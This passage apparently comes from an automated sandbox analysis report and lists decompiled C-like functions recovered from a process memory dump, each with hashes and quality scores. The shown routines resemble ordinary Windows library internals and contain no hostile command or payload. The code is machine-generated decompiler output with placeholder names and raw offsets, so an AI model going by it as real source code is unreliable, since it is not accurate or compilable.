+ 0x2c) =  *(_t77 + 0x2c) & 0x00000000; 								_t30 = _t77 + 0x24; // 0x11a8504 								E010CFFB0(_t77, _t84, _t30); 								if(_t84 != 0 && _t84 !=  &_v156) { 									L010D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t84); 								} 								if(_t86 != 0) { 									goto L12; 								} else { 									goto L11; 								} 							} 							L6: 							 *(_t77 + 0x36) =  *(_t77 + 0x36) | 0x00004000; 							if(_v164 != 0) { 								_t83 = _t84; 								E010E4F49(_t77, _t84); 							} 							goto L8; 						} 						_t87 = _v168; 						continue; 					} 				} 				if(_t88 != 0) { 					goto L19; 				} 				goto L6; 			}                        

                                                                            0x010e4c8b
                                                                            0x010e4c8f
                                                                            0x010e4c8f
                                                                            0x00000000
                                                                            0x010e4c89
                                                                            0x011267c3
                                                                            0x00000000
                                                                            0x011267c3
                                                                            0x011267af
                                                                            0x010e4c73
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000

                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.431895003.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true
                                                                            • Associated: 00000007.00000002.432566539.00000000011AB000.00000040.00000001.sdmp
                                                                            • Associated: 00000007.00000002.432597012.00000000011AF000.00000040.00000001.sdmp
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: af6a05c3fbdf45061b899e3717a791b4aada176fe676da9753ef97d270429bda
                                                                            • Instruction ID: 8e3565b8f7040a8c6efe0d8cff5b7f3d8155650af3a73051d9f55b833b650e9a
                                                                            • Opcode Fuzzy Hash: af6a05c3fbdf45061b899e3717a791b4aada176fe676da9753ef97d270429bda
                                                                            • Instruction Fuzzy Hash: 0941CE32A006299FDB61DF68C944BEEB7F4EF55700F0104A9E948EB241EB349E90CB91
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 94%
                                                                                                                                  E010C8A0A(intOrPtr* __ecx, signed int __edx) { 				signed int _v8; 				char _v524; 				signed int _v528; 				void* _v532; 				char _v536; 				char _v540; 				char _v544; 				intOrPtr* _v548; 				void* __ebx; 				void* __edi; 				void* __esi; 				signed int _t44; 				void* _t46; 				void* _t48; 				signed int _t53; 				signed int _t55; 				intOrPtr* _t62; 				void* _t63; 				unsigned int _t75; 				signed int _t79; 				unsigned int _t81; 				unsigned int _t83; 				signed int _t84; 				void* _t87;  				_t76 = __edx; 				_v8 =  *0x11ad360 ^ _t84; 				_v536 = 0x200; 				_t79 = 0; 				_v548 = __edx; 				_v544 = 0; 				_t62 = __ecx; 				_v540 = 0; 				_v532 =  &_v524; 				if(__edx == 0 || __ecx == 0) { 					L6: 					return E010FB640(_t79, _t62, _v8 ^ _t84, _t76, _t79, _t81); 				} else { 					_v528 = 0; 					E010CE9C0(1, __ecx, 0, 0,  &_v528); 					_t44 = _v528; 					_t81 =  *(_t44 + 0x48) & 0x0000ffff; 					_v528 =  *(_t44 + 0x4a) & 0x0000ffff; 					_t46 = 0xa; 					_t87 = _t81 - _t46; 					if(_t87 > 0 || _t87 == 0) { 						 *_v548 = 0x1091180; 						L5: 						_t79 = 1; 						goto L6; 					} else { 						_t48 = E010E1DB5(_t62,  &_v532,  &_v536); 						_t76 = _v528; 						if(_t48 == 0) { 							L9: 							E010F3C2A(_t81, _t76,  &_v544); 							 *_v548 = _v544; 							goto L5; 						} 						_t62 = _v532; 						if(_t62 != 0) { 							_t83 = (_t81 << 0x10) + (_t76 & 0x0000ffff); 							_t53 =  *_t62; 							_v528 = _t53; 							if(_t53 != 0) { 								_t63 = _t62 + 4; 								_t55 = _v528; 								do { 									if( *((intOrPtr*)(_t63 + 0x10)) == 1) { 										if(E010C8999(_t63,  &_v540) == 0) { 											_t55 = _v528; 										} else { 											_t75 = (( *(_v540 + 0x14) & 0x0000ffff) << 0x10) + ( *(_v540 + 0x16) & 0x0000ffff); 											_t55 = _v528; 											if(_t75 >= _t83) { 												_t83 = _t75; 											} 										} 									} 		
							_t63 = _t63 + 0x14; 									_t55 = _t55 - 1; 									_v528 = _t55; 								} while (_t55 != 0); 								_t62 = _v532; 							} 							if(_t62 !=  &_v524) { 								L010D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t79, _t62); 							} 							_t76 = _t83 & 0x0000ffff; 							_t81 = _t83 >> 0x10; 						} 						goto L9; 					} 				} 			}                        


                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.431895003.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true
                                                                            • Associated: 00000007.00000002.432566539.00000000011AB000.00000040.00000001.sdmp
                                                                            • Associated: 00000007.00000002.432597012.00000000011AF000.00000040.00000001.sdmp
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: c7e51afec23a1e8897955a121205133e1c9b9a46fe6fd57cd4e096306c7dd8f0
                                                                            • Instruction ID: 8a9bc9a9c6cb7eb39db02225e304ffa59884539b76c8ff9c534e2baff065a75c
                                                                            • Opcode Fuzzy Hash: c7e51afec23a1e8897955a121205133e1c9b9a46fe6fd57cd4e096306c7dd8f0
                                                                            • Instruction Fuzzy Hash: 5C4160B0A0022D9BDB64DF59C888AEEB7F4FB54700F1085EED95997252E7709E80CF64
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 69%
                                                                                                                                  E011369A6(signed short* __ecx, void* __eflags) { 				signed int _v8; 				signed int _v16; 				intOrPtr _v20; 				signed int _v24; 				signed short _v28; 				signed int _v32; 				intOrPtr _v36; 				signed int _v40; 				char* _v44; 				signed int _v48; 				intOrPtr _v52; 				signed int _v56; 				char _v60; 				signed int _v64; 				char _v68; 				char _v72; 				signed short* _v76; 				signed int _v80; 				char _v84; 				void* __ebx; 				void* __edi; 				void* __esi; 				void* _t68; 				intOrPtr _t73; 				signed short* _t74; 				void* _t77; 				void* _t78; 				signed int _t79; 				signed int _t80;  				_v8 =  *0x11ad360 ^ _t80; 				_t75 = 0x100; 				_v64 = _v64 & 0x00000000; 				_v76 = __ecx; 				_t79 = 0; 				_t68 = 0; 				_v72 = 1; 				_v68 =  *((intOrPtr*)( *[fs:0x18] + 0x20)); 				_t77 = 0; 				if(L010C6C59(__ecx[2], 0x100, __eflags) != 0) { 					_t79 =  *((intOrPtr*)( *[fs:0x30] + 0x1e8)); 					if(_t79 != 0 && E01136BA3() != 0) { 						_push(0); 						_push(0); 						_push(0); 						_push(0x1f0003); 						_push( &_v64); 						if(E010F9980() >= 0) { 							E010D2280(_t56, 0x11a8778); 							_t77 = 1; 							_t68 = 1; 							if( *0x11a8774 == 0) { 								asm("cdq"); 								 *(_t79 + 0xf70) = _v64; 								 *(_t79 + 0xf74) = 0x100; 								_t75 = 0; 								_t73 = 4; 								_v60 =  &_v68; 								_v52 = _t73; 								_v36 = _t73; 								_t74 = _v76; 								_v44 =  &_v72; 								 *0x11a8774 = 1; 								_v56 = 0; 								_v28 = _t74[2]; 								_v48 = 0; 								_v20 = ( *_t74 & 0x0000ffff) + 2; 								_v40 = 0; 								_v32 = 0; 								_v24 = 0; 								_v16 = 0; 								if(E010BB6F0(0x109c338, 0x109c288, 3,  &_v60) == 0) { 									_v80 = _v80 | 0xffffffff; 									_push( &_v84); 									_push(0); 									_push(_v64); 									_v84 = 0xfa0a1f00; 									E010F9520(); 								} 							} 						} 					} 				} 				if(_v64 != 0) { 		
			_push(_v64); 					E010F95D0(); 					 *(_t79 + 0xf70) =  *(_t79 + 0xf70) & 0x00000000; 					 *(_t79 + 0xf74) =  *(_t79 + 0xf74) & 0x00000000; 				} 				if(_t77 != 0) { 					E010CFFB0(_t68, _t77, 0x11a8778); 				} 				_pop(_t78); 				return E010FB640(_t68, _t68, _v8 ^ _t80, _t75, _t78, _t79); 			}                        


                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.431895003.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true
                                                                            • Associated: 00000007.00000002.432566539.00000000011AB000.00000040.00000001.sdmp
                                                                            • Associated: 00000007.00000002.432597012.00000000011AF000.00000040.00000001.sdmp
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: afb17bf654ac97293d4984cd5e4933eab2ea5dd7a0a70801263576e721e00ea2
                                                                            • Instruction ID: 517bb4460262955260a5b303cd0acb2db7bce92c73e9927b232a321fbf29dc3a
                                                                            • Opcode Fuzzy Hash: afb17bf654ac97293d4984cd5e4933eab2ea5dd7a0a70801263576e721e00ea2
                                                                            • Instruction Fuzzy Hash: 62418DB1D00209AFDB28DFA9D940BFEBBF4EF48714F04812AE954A7244DB709906CB50
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 85%
                                                                                                                                  E010B5210(intOrPtr _a4, void* _a8) { 				void* __ecx; 				intOrPtr _t31; 				signed int _t32; 				signed int _t33; 				intOrPtr _t35; 				signed int _t52; 				void* _t54; 				void* _t56; 				unsigned int _t59; 				signed int _t60; 				void* _t61;  				_t61 = E010B52A5(1); 				if(_t61 == 0) { 					_t31 =  *((intOrPtr*)( *[fs:0x30] + 0x10)); 					_t54 =  *((intOrPtr*)(_t31 + 0x28)); 					_t59 =  *(_t31 + 0x24) & 0x0000ffff; 				} else { 					_t54 =  *((intOrPtr*)(_t61 + 0x10)); 					_t59 =  *(_t61 + 0xc) & 0x0000ffff; 				} 				_t60 = _t59 >> 1; 				_t32 = 0x3a; 				if(_t60 < 2 ||  *((intOrPtr*)(_t54 + _t60 * 2 - 4)) == _t32) { 					_t52 = _t60 + _t60; 					if(_a4 > _t52) { 						goto L5; 					} 					if(_t61 != 0) { 						asm("lock xadd [esi], eax"); 						if((_t32 | 0xffffffff) == 0) { 							_push( *((intOrPtr*)(_t61 + 4))); 							E010F95D0(); 							L010D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61); 						} 					} else { 						E010CEB70(_t54, 0x11a79a0); 					} 					_t26 = _t52 + 2; // 0xddeeddf0 					return _t26; 				} else { 					_t52 = _t60 + _t60; 					if(_a4 < _t52) { 						if(_t61 != 0) { 							asm("lock xadd [esi], eax"); 							if((_t32 | 0xffffffff) == 0) { 								_push( *((intOrPtr*)(_t61 + 4))); 								E010F95D0(); 								L010D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61); 							} 						} else { 							E010CEB70(_t54, 0x11a79a0); 						} 						return _t52; 					} 					L5: 					_t33 = E010FF3E0(_a8, _t54, _t52); 					if(_t61 == 0) { 						E010CEB70(_t54, 0x11a79a0); 					} else { 						asm("lock xadd [esi], eax"); 						if((_t33 | 0xffffffff) == 0) { 							_push( *((intOrPtr*)(_t61 + 4))); 							E010F95D0(); 							L010D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61); 						} 					} 					_t35 = _a8; 					if(_t60 <= 1) { 						L9: 						_t60 = _t60 - 1; 						 *((short*)(_t52 + _t35 - 2)) = 0; 						goto 
L10; 					} else { 						_t56 = 0x3a; 						if( *((intOrPtr*)(_t35 + _t60 * 2 - 4)) == _t56) { 							 *((short*)(_t52 + _t35)) = 0; 							L10: 							return _t60 + _t60; 						} 						goto L9; 					} 				} 			}                        


                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.431895003.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true
                                                                            • Associated: 00000007.00000002.432566539.00000000011AB000.00000040.00000001.sdmp
                                                                            • Associated: 00000007.00000002.432597012.00000000011AF000.00000040.00000001.sdmp
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: cd1c65878e3dfbbbe0b19a3f1c197aee923d7597202cd79706c67b6475c20980
                                                                            • Instruction ID: 0a6ee5165d54810b6e4bc6232d1829c7693bbe6512eb31aa53bce21e7d67c893
                                                                            • Opcode Fuzzy Hash: cd1c65878e3dfbbbe0b19a3f1c197aee923d7597202cd79706c67b6475c20980
                                                                            • Instruction Fuzzy Hash: 0F314831642601DBCB2AAB18CC81BAEBBA5FF15B20F51462AF5950B594E730EC40CB90
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 100%
E010F3D43(signed short* __ecx, signed short* __edx, signed short* _a4, signed short** _a8, intOrPtr* _a12, intOrPtr* _a16) {
    intOrPtr _v8;
    char _v12;
    signed short** _t33;
    short* _t38;
    intOrPtr* _t39;
    intOrPtr* _t41;
    signed short _t43;
    intOrPtr* _t47;
    intOrPtr* _t53;
    signed short _t57;
    intOrPtr _t58;
    signed short _t60;
    signed short* _t61;

    _t47 = __ecx;
    _t61 = __edx;
    _t60 = ( *__ecx & 0x0000ffff) + 2;
    if(_t60 > 0xfffe) {
        L22:
        return 0xc0000106;
    }
    if(__edx != 0) {
        if(_t60 <= ( *(__edx + 2) & 0x0000ffff)) {
            L5:
            E010C7B60(0, _t61, 0x10911c4);
            _v12 =  *_t47;
            _v12 = _v12 + 0xfff8;
            _v8 =  *((intOrPtr*)(_t47 + 4)) + 8;
            E010C7B60(0xfff8, _t61,  &_v12);
            _t33 = _a8;
            if(_t33 != 0) {
                *_t33 = _t61;
            }
            *((short*)(_t61[2] + (( *_t61 & 0x0000ffff) >> 1) * 2)) = 0;
            _t53 = _a12;
            if(_t53 != 0) {
                _t57 = _t61[2];
                _t38 = _t57 + ((( *_t61 & 0x0000ffff) >> 1) - 1) * 2;
                while(_t38 >= _t57) {
                    if( *_t38 == 0x5c) {
                        _t41 = _t38 + 2;
                        if(_t41 == 0) {
                            break;
                        }
                        _t58 = 0;
                        if( *_t41 == 0) {
                            L19:
                            *_t53 = _t58;
                            goto L7;
                        }
                        *_t53 = _t41;
                        goto L7;
                    }
                    _t38 = _t38 - 2;
                }
                _t58 = 0;
                goto L19;
            } else {
                L7:
                _t39 = _a16;
                if(_t39 != 0) {
                    *_t39 = 0;
                    *((intOrPtr*)(_t39 + 4)) = 0;
                    *((intOrPtr*)(_t39 + 8)) = 0;
                    *((intOrPtr*)(_t39 + 0xc)) = 0;
                }
                return 0;
            }
        }
        _t61 = _a4;
        if(_t61 != 0) {
            L3:
            _t43 = L010D4620(0,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t60);
            _t61[2] = _t43;
            if(_t43 == 0) {
                return 0xc0000017;
            }
            _t61[1] = _t60;
            *_t61 = 0;
            goto L5;
        }
        goto L22;
    }
    _t61 = _a4;
    if(_t61 == 0) {
        return 0xc000000d;
    }
    goto L3;
}


                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.431895003.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true
                                                                            • Associated: 00000007.00000002.432566539.00000000011AB000.00000040.00000001.sdmp
                                                                            • Associated: 00000007.00000002.432597012.00000000011AF000.00000040.00000001.sdmp
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: d5c9982c79574a85f21146b06b8a5e8a6347fa626353c9e0df51118ea05c96bb
                                                                            • Instruction ID: bee9971b1944f082778bea4c71a827bf8ae8c4e495783d01b6d1a3e602840342
                                                                            • Opcode Fuzzy Hash: d5c9982c79574a85f21146b06b8a5e8a6347fa626353c9e0df51118ea05c96bb
                                                                            • Instruction Fuzzy Hash: 6D31B071601625DBD7299F2DD442A6BBBF5FF45720B05806EEA86CFB90E730D840C790
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 78%
E010EA61C(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
    intOrPtr _t35;
    intOrPtr _t39;
    intOrPtr _t45;
    intOrPtr* _t51;
    intOrPtr* _t52;
    intOrPtr* _t55;
    signed int _t57;
    intOrPtr* _t59;
    intOrPtr _t68;
    intOrPtr* _t77;
    void* _t79;
    signed int _t80;
    intOrPtr _t81;
    char* _t82;
    void* _t83;

    _push(0x24);
    _push(0x1190220);
    E0110D08C(__ebx, __edi, __esi);
    *((intOrPtr*)(_t83 - 0x30)) = __edx;
    _t79 = __ecx;
    _t35 =  *0x11a7b9c; // 0x0
    _t55 = L010D4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t35 + 0xc0000, 0x28);
    *((intOrPtr*)(_t83 - 0x24)) = _t55;
    if(_t55 == 0) {
        _t39 = 0xc0000017;
        L11:
        return E0110D0D1(_t39);
    }
    _t68 = 0;
    *((intOrPtr*)(_t83 - 0x1c)) = 0;
    *(_t83 - 4) =  *(_t83 - 4) & 0;
    _t7 = _t55 + 8; // 0x8
    _t57 = 6;
    memcpy(_t7, _t79, _t57 << 2);
    _t80 = 0xfffffffe;
    *(_t83 - 4) = _t80;
    if(0 < 0) {
        L14:
        _t81 =  *((intOrPtr*)(_t83 - 0x1c));
        L20:
        L010D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t55);
        _t39 = _t81;
        goto L11;
    }
    if( *((intOrPtr*)(_t55 + 0xc)) <  *(_t55 + 8)) {
        _t81 = 0xc000007b;
        goto L20;
    }
    if( *((intOrPtr*)(_t83 + 0xc)) == 0) {
        _t59 =  *((intOrPtr*)(_t83 + 8));
        _t45 =  *_t59;
        *((intOrPtr*)(_t83 - 0x20)) = _t45;
        *_t59 = _t45 + 1;
        L6:
        *(_t83 - 4) = 1;
        *((intOrPtr*)( *((intOrPtr*)(_t55 + 0x10)))) =  *((intOrPtr*)(_t83 - 0x20));
        *(_t83 - 4) = _t80;
        if(_t68 < 0) {
            _t82 =  *((intOrPtr*)(_t83 + 0xc));
            if(_t82 == 0) {
                goto L14;
            }
            asm("btr eax, ecx");
            _t81 =  *((intOrPtr*)(_t83 - 0x1c));
            if( *_t82 != 0) {
                *0x11a7b10 =  *0x11a7b10 - 8;
            }
            goto L20;
        }
        *((intOrPtr*)(_t55 + 0x24)) =  *((intOrPtr*)(_t83 - 0x20));
        *((intOrPtr*)(_t55 + 0x20)) =  *((intOrPtr*)(_t83 - 0x30));
        _t51 =  *0x11a536c; // 0x5eb118
        if( *_t51 != 0x11a5368) {
            _push(3);
            asm("int 0x29");
            goto L14;
        }
        *_t55 = 0x11a5368;
        *((intOrPtr*)(_t55 + 4)) = _t51;
        *_t51 = _t55;
        *0x11a536c = _t55;
        _t52 =  *((intOrPtr*)(_t83 + 0x10));
        if(_t52 != 0) {
            *_t52 = _t55;
        }
        _t39 = 0;
        goto L11;
    }
    _t77 =  *((intOrPtr*)(_t83 + 8));
    _t68 = E010EA70E(_t77,  *((intOrPtr*)(_t83 + 0xc)));
    *((intOrPtr*)(_t83 - 0x1c)) = _t68;
    if(_t68 < 0) {
        goto L14;
    }
    *((intOrPtr*)(_t83 - 0x20)) =  *_t77;
    goto L6;
}


                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.431895003.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true
                                                                            • Associated: 00000007.00000002.432566539.00000000011AB000.00000040.00000001.sdmp
                                                                            • Associated: 00000007.00000002.432597012.00000000011AF000.00000040.00000001.sdmp
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: c93db037ffba1bffc43561a969abc34cb3de1ede383cfec6b2c61f515c61428f
                                                                            • Instruction ID: 2437ed5f416afe3336ac614f6160b4147a647ee3af77785ea00ec755854ec332
                                                                            • Opcode Fuzzy Hash: c93db037ffba1bffc43561a969abc34cb3de1ede383cfec6b2c61f515c61428f
                                                                            • Instruction Fuzzy Hash: CA4189B5A04219DFCB19CF59C890B99BBF2BF8D304F1980A9E955AB384C374A941CF60
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 68%
E010DC182(void* __ecx, unsigned int* __edx, intOrPtr _a4) {
    signed int* _v8;
    char _v16;
    void* __ebx;
    void* __edi;
    signed char _t33;
    signed char _t43;
    signed char _t48;
    signed char _t62;
    void* _t63;
    intOrPtr _t69;
    intOrPtr _t71;
    unsigned int* _t82;
    void* _t83;

    _t80 = __ecx;
    _t82 = __edx;
    _t33 =  *((intOrPtr*)(__ecx + 0xde));
    _t62 = _t33 >> 0x00000001 & 0x00000001;
    if((_t33 & 0x00000001) != 0) {
        _v8 = ((0 | _t62 != 0x00000000) - 0x00000001 & 0x00000048) + 8 + __edx;
        if(E010D7D50() != 0) {
            _t43 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
        } else {
            _t43 = 0x7ffe0386;
        }
        if( *_t43 != 0) {
            _t43 = E01188D34(_v8, _t80);
        }
        E010D2280(_t43, _t82);
        if( *((char*)(_t80 + 0xdc)) == 0) {
            E010CFFB0(_t62, _t80, _t82);
            *(_t80 + 0xde) =  *(_t80 + 0xde) | 0x00000004;
            _t30 = _t80 + 0xd0; // 0xd0
            _t83 = _t30;
            E01188833(_t83,  &_v16);
            _t81 = _t80 + 0x90;
            E010CFFB0(_t62, _t80 + 0x90, _t80 + 0x90);
            _t63 = 0;
            _push(0);
            _push(_t83);
            _t48 = E010FB180();
            if(_a4 != 0) {
                E010D2280(_t48, _t81);
            }
        } else {
            _t69 = _v8;
            _t12 = _t80 + 0x98; // 0x98
            _t13 = _t69 + 0xc; // 0x575651ff
            E010DBB2D(_t13, _t12);
            _t71 = _v8;
            _t15 = _t80 + 0xb0; // 0xb0
            _t16 = _t71 + 8; // 0x8b000cc2
            E010DBB2D(_t16, _t15);
            E010DB944(_v8, _t62);
            *((char*)(_t80 + 0xdc)) = 0;
            E010CFFB0(0, _t80, _t82);
            *((intOrPtr*)(_t80 + 0xd8)) = 0;
            *((intOrPtr*)(_t80 + 0xc8)) = 0;
            *((intOrPtr*)(_t80 + 0xcc)) = 0;
            *(_t80 + 0xde) = 0;
            if(_a4 == 0) {
                _t25 = _t80 + 0x90; // 0x90
                E010CFFB0(0, _t80, _t25);
            }
            _t63 = 1;
        }
        return _t63;
    }
    *((intOrPtr*)(__ecx + 0xc8)) = 0;
    *((intOrPtr*)(__ecx + 0xcc)) = 0;
    if(_a4 == 0) {
        _t24 = _t80 + 0x90; // 0x90
        E010CFFB0(0, __ecx, _t24);
    }
    return 0;
}


                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.431895003.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true
                                                                            • Associated: 00000007.00000002.432566539.00000000011AB000.00000040.00000001.sdmp
                                                                            • Associated: 00000007.00000002.432597012.00000000011AF000.00000040.00000001.sdmp
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
                                                                            • Instruction ID: 672a4a2729e5fca0fa44eb6dc4fa69c25623d066feae3700e2dcb2fd51a4dac0
                                                                            • Opcode Fuzzy Hash: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
                                                                            • Instruction Fuzzy Hash: 0631147260168BBEE709EBB4C580BFDFB95BF52204F04415ED49C47201DB346A16CBA1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 76%
E01137016(short __ecx, intOrPtr __edx, char _a4, char _a8, signed short* _a12, signed short* _a16) {
    signed int _v8;
    char _v588;
    intOrPtr _v592;
    intOrPtr _v596;
    signed short* _v600;
    char _v604;
    short _v606;
    void* __ebx;
    void* __edi;
    void* __esi;
    signed short* _t55;
    void* _t56;
    signed short* _t58;
    signed char* _t61;
    char* _t68;
    void* _t69;
    void* _t71;
    void* _t72;
    signed int _t75;

    _t64 = __edx;
    _t77 = (_t75 & 0xfffffff8) - 0x25c;
    _v8 = *0x11ad360 ^ (_t75 & 0xfffffff8) - 0x0000025c;
    _t55 = _a16;
    _v606 = __ecx;
    _t71 = 0;
    _t58 = _a12;
    _v596 = __edx;
    _v600 = _t58;
    _t68 = &_v588;
    if(_t58 != 0) {
        _t71 = ( *_t58 & 0x0000ffff) + 2;
        if(_t55 != 0) {
            _t71 = _t71 + ( *_t55 & 0x0000ffff) + 2;
        }
    }
    _t8 = _t71 + 0x2a; // 0x28
    _t33 = _t8;
    _v592 = _t8;
    if(_t71 <= 0x214) {
        L6:
        *((short*)(_t68 + 6)) = _v606;
        if(_t64 != 0xffffffff) {
            asm("cdq");
            *((intOrPtr*)(_t68 + 0x20)) = _t64;
            *((char*)(_t68 + 0x28)) = _a4;
            *((intOrPtr*)(_t68 + 0x24)) = _t64;
            *((char*)(_t68 + 0x29)) = _a8;
            if(_t71 != 0) {
                _t22 = _t68 + 0x2a; // 0x2a
                _t64 = _t22;
                E01136B4C(_t58, _t22, _t71, &_v604);
                if(_t55 != 0) {
                    _t25 = _v604 + 0x2a; // 0x2a
                    _t64 = _t25 + _t68;
                    E01136B4C(_t55, _t25 + _t68, _t71 - _v604, &_v604);
                }
                if(E010D7D50() == 0) {
                    _t61 = 0x7ffe0384;
                } else {
                    _t61 = *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                }
                _push(_t68);
                _push(_v592 + 0xffffffe0);
                _push(0x402);
                _push( *_t61 & 0x000000ff);
                E010F9AE0();
            }
        }
        _t35 = &_v588;
        if( &_v588 != _t68) {
            _t35 = L010D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t68);
        }
        L16:
        _pop(_t69);
        _pop(_t72);
        _pop(_t56);
        return E010FB640(_t35, _t56, _v8 ^ _t77, _t64, _t69, _t72);
    }
    _t68 = L010D4620(_t58, *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t33);
    if(_t68 == 0) {
        goto L16;
    } else {
        _t58 = _v600;
        _t64 = _v596;
        goto L6;
    }
}


                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.431895003.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true
                                                                            • Associated: 00000007.00000002.432566539.00000000011AB000.00000040.00000001.sdmp
                                                                            • Associated: 00000007.00000002.432597012.00000000011AF000.00000040.00000001.sdmp
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 97120f0e708a5e931f70431897ab9445b5d9a6084b1bc53005cafce53e9c4557
                                                                            • Instruction ID: 332719a0e5c6c3a982f262eb8b6b9689e7cd5bb513d2ffa4faece21334a7b616
                                                                            • Opcode Fuzzy Hash: 97120f0e708a5e931f70431897ab9445b5d9a6084b1bc53005cafce53e9c4557
                                                                            • Instruction Fuzzy Hash: 0D31C4B26047519BD325DF28C840AAAB7E5FFC9700F044A2DF99597694E730E904CBA6
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 86%
E010F6DE6(signed int __ecx, void* __edx, signed int _a4, intOrPtr* _a8, intOrPtr* _a12) {
    intOrPtr _v8;
    intOrPtr _t39;
    intOrPtr _t52;
    intOrPtr _t53;
    signed int _t59;
    signed int _t63;
    intOrPtr _t64;
    intOrPtr* _t66;
    void* _t68;
    intOrPtr _t69;
    signed int _t73;
    signed int _t75;
    intOrPtr _t77;
    signed int _t80;
    intOrPtr _t82;

    _t68 = __edx;
    _push(__ecx);
    _t80 = __ecx;
    _t75 = _a4;
    if(__edx > *((intOrPtr*)(__ecx + 0x90))) {
        L23:
        asm("lock inc dword [esi+0x110]");
        if(( *(_t80 + 0xd4) & 0x00010000) != 0) {
            asm("lock inc dword [ecx+eax+0x4]");
        }
        _t39 = 0;
        L13:
        return _t39;
    }
    _t63 = *(__ecx + 0x88);
    _t4 = _t68 + 7; // 0xa
    _t69 = *((intOrPtr*)(__ecx + 0x8c));
    _t59 = _t4 & 0xfffffff8;
    _v8 = _t69;
    if(_t75 >= _t63) {
        _t75 = _t75 % _t63;
        L15:
        _t69 = _v8;
    }
    _t64 = *((intOrPtr*)(_t80 + 0x17c + _t75 * 4));
    if(_t64 == 0) {
        L14:
        if(E010F6EBE(_t80, _t64, _t75) != 1) {
            goto L23;
        }
        goto L15;
    }
    asm("lock inc dword [ecx+0xc]");
    if( *((intOrPtr*)(_t64 + 0x2c)) != 1 || *((intOrPtr*)(_t64 + 8)) > _t69) {
        goto L14;
    } else {
        _t73 = _t59;
        asm("lock xadd [eax], edx");
        if(_t73 + _t59 > _v8) {
            if(_t73 <= _v8) {
                *(_t64 + 4) = _t73;
            }
            goto L14;
        }
        _t77 = _t73 + _t64;
        _v8 = _t77;
        *_a12 = _t64;
        _t66 = _a8;
        if(_t66 == 0) {
            L12:
            _t39 = _t77;
            goto L13;
        }
        _t52 = *((intOrPtr*)(_t80 + 0x10));
        if(_t52 != 0) {
            _t53 = _t52 - 1;
            if(_t53 == 0) {
                asm("rdtsc");
                *_t66 = _t53;
                L11:
                *(_t66 + 4) = _t73;
                goto L12;
            }
            E010E6A60(_t66);
            goto L12;
        }
        while(1) {
            _t73 = *0x7ffe0018;
            _t82 = *0x7FFE0014;
            if(_t73 == *0x7FFE001C) {
                break;
            }
            asm("pause");
        }
        _t66 = _a8;
        _t77 = _v8;
        *_t66 = _t82;
        goto L11;
    }
}


                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.431895003.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true
                                                                            • Associated: 00000007.00000002.432566539.00000000011AB000.00000040.00000001.sdmp
                                                                            • Associated: 00000007.00000002.432597012.00000000011AF000.00000040.00000001.sdmp
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 8f5923ccfc62e11761a64181f477a9fcd764954153fe337c5a9bd4bea8846838
